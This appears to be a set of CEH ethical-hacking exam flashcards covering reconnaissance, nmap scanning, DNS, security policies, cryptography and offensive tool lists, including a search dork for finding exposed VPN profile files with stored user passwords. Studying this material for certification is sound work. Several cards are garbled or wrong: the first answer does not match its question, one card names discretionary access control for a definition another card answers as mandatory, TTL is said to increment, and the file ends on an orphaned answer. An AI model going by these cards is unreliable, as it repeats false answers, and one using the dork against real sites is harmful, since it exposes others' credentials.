In which stage of an ethical hack would the attacker actively apply tools and techniques to gather more in-depth information on the targets? A. Active reconnaissance B. Scanning and enumeration C. Gaining access D. Passive reconnaissance

Construction stage

In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries build?

Construction stage

In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries built?

Design phase

In which stage of the Secure Software Development Lifecycle is the platform and programming language chosen?

E)Cracking passwords

In which step of the CEH Hacking Methodology (CHM) do you recover the credentials for a system account? A)Covering tracks B)Hiding files C)Executing applications D)Penetration testing E)Cracking passwords F)Escalating privileges

TechSpy EmpSpy

InSpy has two functionalities: __: Crawls LinkedIn job listings for technologies used by the target company __: Crawls LinkedIn for employees working at the provided company

White Hats

Individuals professing hacker skills and using them for defensive purposes and are also known as security analysts

Suicide Hackers

Individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment

Hacktivist

Individuals who promote a political agenda by hacking, especially by defacing or disabling websites

Gray Hats

Individuals who work both offensively and defensively at various times

Black Hats

Individuals with extraordinary computing skills, resorting to malicious or destructive activities and are also known as crackers

GiliSoft File Lock Pro

It lock files, folders, and drives; hide files, folder, and drives to make them invisible; or password protects files folders, and drives

(Inverse TCP flag) No response RST/ACK

Inverse TCP flag, if the port is open there will be ____, if the port is closed, a ____ will be sent in response.

Evaluation Assurance Level (EAL)

It provided a way for vendors to make claims about their in-place security by following a set standard of controls and testing methods. Levels 1-7

Passwords Policy

It provides guidelines for using strong password protection on organization's resources

Botnot

Is a huge network of the compromised systems used by an intruder to perform various network attacks

Defense in Depth

Is a security strategy in which several protection layers are placed throughout an information system

Incident Management

Is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore normal service operations as quickly as possible and prevent future recurrence of the incident

Enterprise Information Security Architecture (EISA)

Is a set of requirements, processes, principles, and models that determines the structure and behavior of an organizaiton's information systems

Competitive Intelligence Gathering

Is the process of identifying, gathering, analyzing, verifying, and using information about your competitors from resources such as the Internet

Identify Vulnerabilities

It allows attacker to identify vulnerabilities in the target systems in order to select appropriate exploits

Draw Network Map

It allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are going to break

decoys as well as the host(s)

It appears to the target that the ___ are scanning the network when using the IP address decoy technique

Firewall-Management Policy

It defines access, management, and monitoring of firewalls in the organization

Acceptable-Use Policy

It defines the acceptable use of system resources

User-Account Policy

It defines the account creation process, and authority, rights and responsibilities of user accounts

Access Control Policy

It defines the resources being protected and the rules that control access to them

Information-Protection Policy

It defines the sensitivity levels of information, who may have access, how is it stored and transmitted, and how should it be deleted from storage media

Remote-Access Policy

It defines who can have remote access, and defines access medium and remote access security controls

Network-Connection Policy

It defines who can install new resources on the network, approve the installation of new devices, document network changes, etc.

Paranoid Policy

It forbids everything, no internet connection, or severely limited internet usage

Daisy Chaining

It involves gaining access to one network and/or computer and then using the same information to gain access to multiple networks and computers that contain desirable information

Physical Security

It involves protection of organizational assets from environmental and man made threats

Insider Attack

It is an attack performed on a corporate network or on a single computer by an entrusted person who has authorized access to the network

Log what has occurred, consult the security policy, and act accordingly

Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation? A)Log what has occurred and immediately call the incident response team B)Log what has occurred, consult the security policy, and act accordingly C)Log what has occurred and continue normal administrative duties D)Log what has occurred and wait for further evidence of an attack

A. DNS poisoning

Joe accesses the company website, www.anybusi.com, from his home computer and is presented with a defaced site containing disturbing images. He calls the IT department to report the website hack and is told they do not see any problem with the site--no files have been changed, and when accessed from their terminals (inside the company), the site appears normally. Joe connects over VPN into the company website and notices the site appears normally. Which of the following might explain the issue? A. DNS poisoning B. Route poisoning C. SQL injection D. ARP poisoning

B. Suicide hacker

Joe is a security engineer for a firm. His company downsizes, and Joe discovers he will be laid off within a short amount of time. Joe plants viruses and sets about destroying data and settings throughout the network, with no regard to being caught. Which type of hacker is Joe considered to be? A. Hactivist B. Suicide hacker C. Black hat D. Script kiddie

C)Insider affiliate

Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present? A)Pure insider B)Insider associate C)Insider affiliate D)Outside affiliate

name resolution

LLMNR and NBT-NS are two main elements of Windows operating systems used to perform ___ for hosts present on the same link

Responder Metasploit NBNSpoof Inweigh

LLMNR/NBT-NS Spoofing Tools

Presentation

Layer 6 of OSI model

Banner grabbing from page extensions

Looking for an extension in the URL may assist in determining the application version Example: .aspx => IIS server and Windows platform

C. The username and password fields stored in the table named users will be displayed

Log files from an attack reveal the following entry SELECT username, password FROM users; Which of the following best describes the result of this command query? A. The username and password fields will be deleted from a table named users B. A username field and a password field will be added to a table named users C. The username and password fields stored in the table named users will be displayed D. The command will not produce any results

!Host=*.* intext:enc_UserPassword=*ext"pcf

Look for .pcf files which contains user VPN profiles

allowing remote access

Necurs contains backdoor functionality, ___ and control of the infected computer

C)Public-key encryption and digital signatures

Management decides to implement a public key infrastructure (PKI) on the network. Which services will it provide? A)Private-key encryption and digital signatures B)Hashing and digital signatures C)Public-key encryption and digital signatures D)Public-key encryption and hashing

contingency plan

Management policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.

nmap -D decoy1, decoy2, decoy3,... etc.

Manually specify the IP addresses of the decoys using Nmap

Health Insurance Portability and Accountability Act (HIPAA)

Many medical facilities need to maintain compliance with the ___.

Google Earth Google Maps Bing Maps

Mapping and location-specific information, including drive-by pictures of the company exterior and overhead shots can be found where?

Spytech SpyAgent Power Spy

Name a couple of Spyware

Horse Pill GrayFish Sirefef Necurs

Name four Rootkits

logical or physical path

Network diagram shows ____ to a potential target

D. A parallel, fast ACK scan of a Class C subnet

Nmap is a powerful scanning and enumeration tool. What does the following nmap command attempt to accomplish? nmap -sA -T4 192.168.15.0/24 A. A serial, slow operating system discovery scan of a Class C subnet B. A parallel, fast operating system discovery scan of a Class C subnet C. A serial, slow ACK scan of a Class C subnet D. A parallel, fast ACK scan of a Class C subnet

-To discover live hosts, IP address, and open ports of live hosts - To discover operating systems and system architecture - To discover services running on hosts - To discover vulnerabilities in live hosts

Objectives of Network Scanning

Access creep

Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.

rwho

On a Unix/Linux Displays a list of users who are logged in to hosts on the local network

rusers

On a Unix/Linux Displays a list of users who are logged on to remote machines or machines on local network

finger

On a Unix/Linux Displays information about system users such as user's login name, real name, terminal name, idle time, login time, office location and office phone numbers

arp -a

On a Windows machine what is the command to display your current ARP cache?

Collision domain

On a switch, each switchport represents a ____.

A)Something you have

On your advice, your company will implement a new access control mechanism for the data center. Users must provide the following evidence for authentication: Username/password credentials Smart card swipe Fingerprint scan Once in the data center, the terminal from which they access is logged and verified against a list of allowable machines. You need to justify the additional expense for the multi-factor authentication process to management. Which authentication factor does the smart card satisfy? A)Something you have B)Somewhere you are C)Something you are D)Something you know

nbtstat

On your own machine if you want to bring up a host of switches to use for information-gathering purposes using NetBIOS.

A)Current operating system

One of your ethical hackers logs into several computers using Telnet and grabs the banner on these computers. What information is the ethical hacker able to discover? A)Current operating system B)Running applications C)Currently logged-in user D)Open ports

B. Passive OS fingerprinting

One of your team members is analyzing TTL fields and TCP window sizes in order to fingerprint the OS of a target. Which of the following is most likely being attempted? A. Online OS fingerprinting B. Passive OS fingerprinting C. Aggressive OS fingerprinting D. Active OS fingerprinting

maintain persistence escalate privileges

Path interception helps an attacker to ___ on a system and ___

NS

Points to host's name server

Permissive Policy

Policy begins wide open and only known dangerous services/attacks or behaviors are blocked. It should be updated regularly to be effective

POP3 (TCP)

Port number 110

SSH (TCP)

Port number 22

Telnet (TCP)

Port number 23

LDAP (TCP, UDP)

Port number 389

Port is open (Inverse TCP Flag Scanning)

Probe Packet (FIN/URG/PSH/NULL) --> <-- No Response

C)Impersonation

Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred? A)Dumpster diving B)Piggybacking C)Impersonation D)Eavesdropping

A)Detective

Requiring an audit trail in the security policy is an example of implementing which type of control? A)Detective B)Compensatory C)Preventative D)Corrective

[inurl:]

Restricts the results to documents containing the search keyword in the URL

[allintitle:]

Restricts the results to those websites with all of the search keywords in the title

Serial number

Revision number of the zone file. This number increments each time the zone file changes and is used by a secondary server to know when to update its copy.

A SID with a RID of 500 for an administrator

S-1-5-21-3874928736-367528774-1298337465-500

C) SNMPv3

SNMP provides great network management resource potential but also produces some significant security vulnerabilities. Which SNMP version provides encryption and authentication measures? A) SNMPv1 B) SNMPv2 C) SNMPv3 D) B and C E) None of the above

is the process of discovering systems on the network and taking a look at what open ports and applications may be running

Scanning

Credit card details and social security number User names and passwords Security products in use Operating systems and software versions Network layout information IP addresses and names of servers

Social engineers attempt to gather:

personal and organizational information

Social networking sites are the great source of ______

F) UDP 514

Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use to you. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 110 C) TCP 161 D) UDP 161 E) TCP 514 F) UDP 514

port 23

Telnet runs on _____.

wireless wired

The AP is connected to both the ___ LAN and the ___ LAN, providing wireless clients access to network resources.

TTL

The ___ on each packer increments by one after each hop is hit and returns.

assessment or security evaluation

The ___ phase, the actual assaults on the security controls are conducted during this time.

D. Attempt banner grabbing.

The following results are from an nmap scan: Starting nmap V. 3.10A ( www.insecure.org/nmap/ <http://www.insecure.org/nmap/> ) Interesting ports on 192.168.15.12: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 263.46 seconds Which of the following is the best option to assist in identifying the operating system? A. Attempt an ACK scan. B. Traceroute to the system. C. Run the same nmap scan with the -vv options. D. Attempt banner grabbing.

"SYN/ACK" (Session request acknowledgment) "RST" (Reset)

The target machine will send back a ___ packet if the port is open, and an ___ packet if the port is closed

Integrity

The trustworthiness of data or resources in terms of preventing improper and unauthorized changes

C)CSRF

The use of random tokens by a web application could help prevent which type of attack? A)XSS B)SQL injection C)CSRF D)SYN flood

A)Type 3/Code 13

You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP? A)Type 3/Code 13 B)Type 3/Code 6 C)Type 13 D)Type 0

A. >

There are certain characters that cannot be used within text in HTML because these characters confuse the browser. In these instances, an HTML entity can be used to represent the character. Which HTML entity corresponds to the great than > character? A. > B. < C. ) D. (

Misconfiguration attacks

These attacks take advantage of systems that are, on purpose or by accident, not configured appropriately for security..

Information Audit Policy

This defines the framework for auditing security within the organization. When, where, how often, and sometimes even who conducts it are described here.

Information Security Policy

This identifies to employees what company systems may be used for, what they cannot be used for, and what the consequences are for breaking the rules. Generally employees are required to sign a copy before accessing resources. Versions of this policy are also known as an Acceptable Use Policy.

MX (Mail Exchange)

This record identifies your e-mail servers within your domain.

Inverse TCP flag (also called FIN scan or NULL scan)

This scan uses the FIN, URG, or PSH flag (or, in one version, no flags at all) to poke at system ports.

Spectre Meltdown Access Token Manipulation Application Shimming File System Permissions Weakness Path Interception Scheduled Task Launch Daemon Plist Modification Setuid and Setgid Web Shell

What are some Privilege Escalation Techniques

B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23

To search for all Telnet packets from 212.77.66.55, which Wireshark expression should be in place? (Choose all that apply) A) ip.src==212.77.66.55 and tcp.srcport==21 B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23 D) ip.src==212.77.66.55 && tcp.srcport==21

Nbtstat SuperScan Hyena Winfingerprint NetBIOS Enumerator NSAuditor

Tools for NetBIOS enumeration:

GetNotify Contact-Monkey Yesware Read Notify WhoReadMe MSGTAG Trace Email Zendio

Tools for email tracking as part of footprinting:

RemoteExec PDQ Deploy Dameware Remote Support ManageEngine Desktop Central PsExec TheFatRat

Tools for executing applications

Rankur Google Alerts Social Mention WhosTalkin ReputationDefender PR Software Naymz BrandsEye Brandyourself Talkwalker

Tools for online reputation of the target.

Proxy Switcher Proxy Workbench ProxyChains SoftCab's Proxy Chain Builder CyberGhost Proxifier

Tools used to set up proxy chains, where multiple proxies further hide your activities.

Cloud Computing Threats Advanced Persistent Threats Viruses and Worms Mobile Threats Botnet Insider Attack

Top 6 Information Security Attack Vectors

Path Analyzer Pro VisualRoute Network Pinger Magic NetTrace GEOSpider 3D Traceroute vTrace AnalogX HyperTrace Trout Network Systems Traceroute Roadkil's Trace Route Ping Plotter

Traceroute Tools

PathAnalyzer Pro VisualRoute GEO Spider Trout Magic NetTrace Ping Plotter Traceroute Tool

Traceroute Tools

ICMP protocl TTL field

Traceroute programs work on the concept of ____ and use the ____ in the header of ICMP packets to discover the routers on the path to a target host.

D. Nessus

Tracy is managing a web server and wants to search for vulnerabilities. What tool would be a good choice for her to start with? A. Black Widow B. Httrack C. BurpSuite D. Nessus

computationally less feasible

Traditional network scanning techniques will be ___ due to larger search space (64 bits of host address space or 2 ^64 addresses) provided by IPv6 in a subnet

target's customer base

Traffic monitoring helps to collect information about the ____ which help attackers to disguise as a customer and launch social engineering attacks on the target

D. The ethical hacker always obtains written permission before testing.

Two hackers attempt to crack a company's network resource security. One is considered an ethical hacker, whereas the other is not. What distinguishes the ethical hacker from the "cracker"? A. The cracker always attempts white-box testing. B. The ethical hacker always attempts black-box testing. C. The cracker posts results to the Internet. D. The ethical hacker always obtains written permission before testing.

Passive Reconnaissance Active Reconnaissance

Two types of Reconnaissance

Operating System Attacks Mis-configuration Attacks Application Level Attacks Shrink-Wrap Code Attacks

Types of Attacks on a System

find specific computers (routers, servers, etc)

Use SHODAN search engine that lets you ____ using a variety of filters.

pdf documents Microsoft Word files

Useful information may reside on the target organizaiton website in the form of ____

Connection status and content-type Accept-Ranges Last-Modified information X-Powered-By information Web server in use and its version

Using Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebub, etc. to view headers that provide what kind of information?

metadata extraction network analysis fingerprinting

Using FOCA, it is possible to undertake multiple attacks and analysis techniques such as ____, ____, DNS snooping, proxies search, ____, open directories search, etc.

normal traffic

Using Reverse HTTP Shells: This type of traffic is considered as a ___ by an organization's network perimeter security like DMZ, firewall, etc.

netstat -b

Using netstat, typing ___ lets you see the executable tied to the open port.

netstat -an

Using netstat, typing ____ displays all connections and listening ports, with addresses and port numbers in numerical form.

B)87698415

Using tcpdump, you acquire the TCP handshake and capture several packets sent between two devices in your network. The last packet you capture contains the following values: Seq no. 26556942 (next seq no. 26557263) Ack no. 87698415 Window 8700 LEN = 1656 bytes 0f data Based on this information, which sequence number will be used in the reply to this packet? A)26556942 B)87698415 C)87698416 D)26557263

Management Network Zone

Usually an area you'd find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.

A. MX

While footprinting a network, you successfully perform a zone transfer. Which DNS record in the zone transfer indicates the company's e-mail server? A. MX B. EM C. SOA D. PTR

Buffer overflow DoS attacks

Vulnerabilities in UPnP may allow attackers to launch ____ or ___

Nessus GFI LanGuard Qualys FreeScan Retina CS OpenVAS Core Impact Professional Security Manger Plus MBSA Nexpose Shadow Security Scanner SAINT Nsauditor Network Security Auditor Security Auditor's Research Assistant (SARA)

Vulnerability Scanners

Retina CS for Mobile SecurityMetrics MobileScan Nessus Vulnerability Scanner

Vulnerability Scanning Tools for Mobile

-Selectively creates custom vulnerability checks -Identifies security vulnerabilities and takes remedial action -Creates different types of scans and vulnerability tests -Helps ensure third-party security applications offer optimum protection -Performs network device vulnerability checks

What are features of GFI LanGuard?

AnyWho PeopleSmart US Search Veromi Intelius PrivateEye 411 People Search Now PeopleFinders Public Background Checks

What are some People Search Online Services?

1) Install and maintain firewall configuration to protect data. 2) Remove vendor-supplied default passwords and other default security features. 3) Protect stored data. 4) Encrypt transmission of cardholder data. 5) Install, use, and update AV (antivirus). 6) Develop secure systems and applications. 7) Use "need to know" as a guideline to restrict access to data. 8) Assign a unique ID to each stakeholder in the process (with computer access). 9) Restrict any physical access to the data. 10) Monitor all access to data and network resources holding, transmitting, or protecting it. 11) Test security procedures and systems regularly. 12) Create and maintain an information security policy.

What are the 12 requirements for groups and organizations involved in the entirety of the payment process--from card issuers, to merchants, to those storing and transmitting card information.

1) Preparation for Incident Handling and Response 2) Detection and Analysis 3) Classification and Prioritization 4) Notification 5) Containment 6) Forensic Investigation 7) Eradication and Recovery 8) Post-incident Activities

What are the Eight steps to the Incident Management Process?

Confidentiality Integrity Availability Authenticity Non-Repudiation

What are the Elements of Information Security

1) Perform risk assessment to identify risks to the organization's assets 2) Learn from standard guidelines and other organizations 3) Include senior management and all other staff in policy development 4) Set clear penalties and enforce them 5) Make final version available to all of the staff in the organization 6) Ensure every member of your staff read, sign, and understand the policy 7) Deploy tools to enforce policies 8) Train your employees and educate them about the policy 9) Regularly review and update

What are the Nine steps to Create and Implement Security Policies?

Black Hats White Hats Gray Hats Suicide Hackers Script Kiddies Cyber Terrorists State Sponsored Hackers Hacktivist

What are the eight hacker Classes?

Internet Internet DMZ Production Network Zone Intranet Zone Management Network Zone

What are the five network security zones defined by ECC?

1) Identify Security Objectives 2) Application Overview 3) Decompose Application 4) Identify Threats 5) Identify Vulnerabilities

What are the five parts of Threat Modeling?

American Registry for Internet Numbers (ARIN) Asia-Pacific Network Information Center (APNIC) Reseaux IP Europeens (RIPE) NCC Latin America and Caribbean Network Information Center (LACNIC) African Network Information Center (AfriNIC)

What are the five registrant bodies?

1) Footprinting through search engines 2) Footprinting using advanced google hacking techniques 3) Footprinting through social networking sites 4) Website footprinting 5) Email footprinting 6) Competitive intelligence 7) WHOIS footprinting 8) DNS footprinting 9) Network footprinting 10) Footprinting through social engineering

What are the ten Footprinting methodology?

Network Threats Host Threats Application Threats

What are the three Information Security Threat Categories?

Unicast Multicast Broadcast

What are the three main address types of IPv4?

Collect Network Information Collect System Information Collect Organization's Information

What are the three main objectives of footprinting?

Security Functionality Usability

What are the three parts to the triangle as one increases the others decrease

Logical safeguards, Administrative safeguards, and physical safeguards

What are the three safeguards in a risk assessments?

Signature-based and anomaly-based

What are the two detection methods used by IDS systems?

To recover keys in the event the original keys are lost or deleted, and to provide access to data to other third parties, such as law enforcement investigations

What are the two functions of key escrow?

Connectionless communication (UDP) Connection-Oriented Communication (TCP)

What are the two methods of data transfer at the Transport layer?

scalar - defines a single object tabular - defines multiple related objects grouped together in MIB tables

What are the two types of managed objects in SNMP.

TTL Window

What are the two versions of ACK flag probe?

XML filters XML gateways Ensuring a robust XML parser

What are three mitigations to a XML DoS attack?

GSA Email Spider Web Data Extractor

What are two web spider tools?

Rapid replication

What are worms typically know for?

Netstat -an

What command is used to listen to open ports with netstat?

Destination unreachable, because it is administratively prohibited (router is blocking ICMP)

What does an ICMP Type 3/Code 13 error message indicate?

Destination unreachable, because the packer requires fragmentation, but the d fragment bit is set

What does an ICMP Type 3/Code 4 error message indicate?

Risk transference

What happens when insurance is used to eliminate a risk?

Source host Contact e-mail Serial number Refresh time Retry time Expire time TTL

What information can be found in the SOA record?

Total visitors Page views Bounce rate Live visitors map Site ranking

What information can be gathered monitoring website traffic?

A)Blood vessels

What information is measured in a retina scan? A)Blood vessels B)Pupil size C)Colored ridges D)Ocular pressure

Residential address Email addresses Contact numbers Date of birth Photos Social networking profiles Blog URLs Satellite pictures of private residencies Upcoming projects Operating environment

What information is returned from doing a people search about a person or organization?

B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security

Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides? A. Vulnerability measurement and assessments for the U.S. Department of Defense B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security C. Incident response services for all Internet providers D. Pen test registration for public and private sector

C)Filtering network packets

Which of the following can NOT be prevented by the security and privacy settings on a client's web browser? A)Running Java applets B)Cookie storage C)Filtering network packets D)Handling pop-up windows

Input validation

Which of the following can prevent bad input from being presented to an application?

A)Username and password

Which of the following combinations does NOT represent multi-factor authentication? A)Username and password B)Fingerprint scan and password C)USB token and retina scan D)USB token and password

D. lsof

Which of the following commands is the best choice to use on a Linux machine when attempting to list processes and the UIDs associated with them in a reliable manner? A. ls B. chmod C. pwd D. lsof

C) sc query

Which of the following commands lists the running services on a Windows machine? A) netsh services B) netstat -s C) sc query D) wmic bios get services

C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24

Which of the following commands would you use to quickly identify live targets on a subnet? (Choose all the apply.) A. nmap -A 172.17.24.17 B. nmap -O 172.17.24.0/24 C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24

C)SSL

Which of the following connection types can cause a security issue when an IDS is in the path? A)T1 B)ISDN C)SSL D)GRE tunnel

A)Announcement of a security hole in a product

Which of the following constitutes a vulnerability? A)Announcement of a security hole in a product B)Detailed description of how to exploit a product C)Instructions on how to secure a product D)List of best practices to prevent exploitation

A. Use ARPWALL. C. Use private VLANs D. Use static ARP entries.

Which of the following could provide useful defense against ARP spoofing? (Choose all that apply.) A. Use ARPWALL B. Set all NICs to promiscuous mode. C. Use private VLANs. D. Use static ARP entries.

B. Blue team

Which of the following describes security personnel who act in defense of the network during attack simulations? A. Red team B. Blue team C. Black hats D. White hats

C)Attack profile

Which of the following does NOT occur during risk assessment? A)Vulnerability identification B)Threat identification C)Attack profile D)Control analysis

B)Adherence of a company to its security policy

Which of the following does a security audit evaluate? A)Execution of the security plan B)Adherence of a company to its security policy C)Adherence of the security policy to industry standards D)Security readiness of the organization

C) Discretionary access control

Which of the following ensures that the enforcement of an organizational security policy does not rely on voluntary user compliance and secures information by assigning labels on information and comparing this to the level of security a user is operating at? A) Authorized access control B) Mandatory access control C) Discretionary access control D) Role-based access control

D)Network topology weaknesses F)Application configuration errors

Which of the following information can be gathered by a network vulnerability scanner? (Choose all that apply.) A)Spear phishing email storage B)Sensitive information sent to outside networks C)Local user account credentials D)Network topology weaknesses E)Packets received from malicious sources F)Application configuration errors

A)They are usually expensive to implement.

Which of the following is NOT a drawback to implementing anti-virus systems? A)They are usually expensive to implement. B)They rely upon signature file updates. C)They often provide limited detection techniques. D)They negatively affect the performance of the system on which they reside.

D)Server layer

Which of the following is NOT a layer of the Web application architecture? A)Client layer B)Business logic layer C)Database layer D)Server layer

C)Provides only user behavior measurement and analysis

Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)? A)Provides a large number of false positives B)Requires an attack signature to detect new attack types. C)Provides only user behavior measurement and analysis D)Can be defeated by network tunnels and encryption

B)Copying sensitive data to a USB drive

Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability? A)Exposure of passwords B)Copying sensitive data to a USB drive C)Exposure of sensitive files D)Improper access to databases

C)Syntax of the certificate

Which of the following is NOT accomplished during certificate validation? A)Integrity of the certificate B)Identity of the issuer C)Syntax of the certificate D)Validity of the certificate

A)Faster than the CORBA standard

Which of the following is NOT an advantage to using SOAP? A)Faster than the CORBA standard B)Platform-independent C)Leverages multiple transport protocols D)Simplifies communications

C) TCP-over-dns

Which of the following is a client server tool utilized to evade firewall inspection? A) Kismet B) Wireshark C) TCP-over-dns D) Snow

B)XML denial of service issues

Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways? A)Insecure communications B)XML denial of service issues C)Replay attacks D)Information leakage

A. Audit trail

Which of the following is a detective control? A. Audit trail B. CONOPS C. Procedure D. Smartcard authentication E. Process

B) As a symmetric key algorithm, the keys would need to be sent over a different channel

Which of the following is a potential drawback to using AES to share data? A) It takes a long time to encrypt data, which slows down communication B) As a symmetric key algorithm, the keys would need to be sent over a different channel C) Configuration of AES is complicated and time-consuming to set up D) Performance is greatly affected by massive overhead

C)Tailgating

Which of the following is an attack on physical security? A)SYN flood B)Brute force C)Tailgating D)IP spoofing

B)Static WEP key

Which of the following is an example of a symmetric encryption? A)File hash B)Static WEP key C)Public key D)Private key

C)Wireshark

Which of the following is an open-source packet analyzer that can be used for network troubleshooting and analysis? A)Cain and Abel B)Nessus C)Wireshark D)CUPP

B) Single sign on

Which of the following is defined as a system where users need to remember only one user ID and password combination to be authenticated for multiple resources? A) Simple sign on B) Single sign on C) Digital sign on D) Certificate sign on

A. Mandatory access control

Which of the following is defined as ensuring the enforcement of organizational security policy does not rely on voluntary user compliance by assigning sensitivity labels on information and comparing this to the level of security a user is operating at? A. Mandatory access control B. Authorized access control C. Role-based access control D. Discretionary access control

A. DNS poisoning

Which of the following is described as the process of distributing incorrect IP addresses and name pairs with the intent of diverting traffic? A. DNS poisoning B. DNS spoofing C. Network aliasing D. Reverse Address Resolution Protocol

D)Internal website not the same as the external company website

Which of the following is evidence of a DNS poisoning attack? A)Data forwarded to the wrong switch ports B)Unusual amount of TCP SYN requests to the web server C)Traffic misdirected internally to the wrong subnet D)Internal website not the same as the external company website

D)ACLs on the router and NTFS permissions on files

Which of the following is the BEST example of defense in depth? A)Two access control lists on the same router B)Two factors required for authentication on a single system C)Two different anti-virus applications installed on every computer D)ACLs on the router and NTFS permissions on files

B)DSA

Which of the following is the Federal Information Processing Standard for digital signatures? A)AES B)DSA C)RSA D)GAK

D) Ensure services run with least privilege

Which of the following is the best choice for protection against privilege escalation vulnerabilities? A) Ensure drivers are appropriately signed B) Set admin accounts to run on least privilege C) Make maximum use of automated services D) Ensure services run with least privilege

C. Connect to a SPAN port on a switch

Which of the following is the best choice in setting an NIDS tap? A. Connect directly to a server inside the DMZ. B. Connect directly to a server in the intranet. C. Connect to a SPAN port on a switch. D. Connect to the console port of a router.

B)Sheep dipping

Which of the following is the process of analyzing suspect files for viruses and other malware? A)Purging B)Sheep dipping C)Cleaning D)Degaussing

D)Symmetric algorithm

Which of the following is true of 3DES? A)Hashing algorithm B)Stronger than AES C)Stream cipher D)Symmetric algorithm

E) All of the above

Which of the following is true regarding Kerberos? A) Kerberos makes use of UDP as a transport protocol B) Kerberos makes use of TCP as a transport protocol C) Kerberos uses port 88 for transmission of data D) Kerberos makes use of both symmetric and asymmetric encryption techniques E) All of the above

C) MX record priority increases as the preference number decreases

Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX record priority increases as the preference number decreases D) MX record entries are required for every namespace

C) MX records priority increases as the preference number decreases

Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX records priority increases as the preference number decreases D) MX record entries are required for every namespace

A) SSL works at the transport layer and S-HTTP operates at the application layer

Which of the following is true regarding SSL and S-HTTP? A) SSL works at the transport layer and S-HTTP operates at the application layer B) SSL works at the Network layer and S-HTTP operates at the application layer C) SSL works at the application layer and S-HTTP operates at the Network layer D) SSL works at the application layer and S-HTTP operates at the transport layer

B) A POP3 client contacts the server to receive mail

Which of the following is true regarding a POP3 client? A) A POP3 client contacts the server to send mail B) A POP3 client contacts the server to receive mail C) A POP3 client contacts the server to send and receive mail D) None of the above

A. Static NAT is one to one mapping

Which of the following is true regarding static NAT? A. Static NAT is one to one mapping B. Static NAT is one to many mapping C. Static NAT is many to many mapping D. Static NAT is many to one mapping

A) The location of the Snort rules for this device is c:\ect\snort\rules

Which of the following is true regarding the Snort configuration entry shown here: val RULE_PATH c:\ect\snort\rules A) The location of the Snort rules for this device is c:\ect\snort\rules B) All rule violations should alert to c:\ect\snort\rules C) The Snort configuration file is located in c:\ect\snort\rules D) None of the above

D. traceroute

You are on a Cisco router and wish to identify the path a packet travels to a specific IP. Which of the following is the best command choice for this? A. ping B. ifconfig C. tracert D. traceroute

D. It is almost impossible to discover the sniffer on the network.

Which of the following is true regarding the discovery of sniffers on a network? A. To discover the sniffer, ping all addresses and examine latency in responses. B. To discover the sniffer, send ARP messages to all systems and watch for NOARP responses. C. To discover the sniffer, configure the IDS to watch for NICs in promiscuous mode. D. It is almost impossible to discover the sniffer on the network.

telnet

Which of the following is used for banner grabbing?

Netcraft

Which of the following is used for identifying a web server OS?

D. Base64

Which of the following is used to encode password within HTTP basic access authentication? A. MD5 B. TDM C. FDM D. Base64 E. DES

nmap

Which of the following is used to perform customized network scans?

A) A worm is malware B) A worm replicates on its own

Which of the following is/are true of a worm? A) A worm is malware B) A worm replicates on its own

C)Java

Which of the following languages poses the highest security risk because of its high penetration rate, number of documented vulnerabilities, and average user patch status? A)C++ B)C# C)Java D)Python

B)CSIRT

Which of the following organizations provides incident response services in partnership with the Department of Homeland Security? A)OWASP B)CSIRT C)NIST D)ITIL

D)More acceptance of the policy

Which of the following results when a consistent security policy has the support of executive management? A)More compressed SLAs B)More input from users C)Fewer security breaches D)More acceptance of the policy

B. MAC flooding D. ARP spoofing

Which of the following techniques can be used to gather information from a fully switched network or to disable some of the traffic isolation features of a switch? (Choose two.) A. DHCP starvation B. MAC flooding C. Promiscuous mode D. ARP spoofing

A)Token-passing network

Which of the following technologies passes a signal between nodes that authorizes each node to communicate only when the node possesses the signal? A)Token-passing network B)VPN C)Mesh network D)Star network

A. Whisker B. Fragroute E. ADMutate F. Inundator

Which of the following tools can assist with IDS evasion? (Choose all that apply.) A. Whisker B. Fragroute C. Capsa D. Wireshark E. ADMutate F. Inundator

C. TCPflow

Which of the following tools can be used to extract application layer data from TCP connections captured in a log file into separate files? A. Snort B. Netcat C. TCPflow D. Tcpdump

C. Libwhisker

Which of the following tools is the best choice to assist in evading an IDS? A. Nessus B. Nikto C. Libwhisker D. Snort

E)SwayzCryptor

